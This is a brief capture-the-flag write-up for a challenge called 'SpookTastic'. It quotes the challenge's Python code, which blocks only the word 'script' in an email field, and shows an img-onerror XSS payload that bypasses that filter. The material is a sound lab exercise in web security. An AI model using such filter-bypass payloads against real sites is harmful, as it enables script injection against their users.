SpookTastic
SpookTastic
SOLUTION
By analyzing the source code, we can see the black list
1
2
3
4
5
6
7
8
9
10
11
12
13
14
def blacklist_pass(email):
email = email.lower()
if "script" in email:
return False
return True
def send_flag(user_ip):
for id, ip in socket_clients.items():
if ip == user_ip:
socketio.emit("flag", {"flag": open("flag.txt").read()}, room=id)
we can not use <script> for XSS payload, how about <img>
1
<img src=x onerror=alert(2)>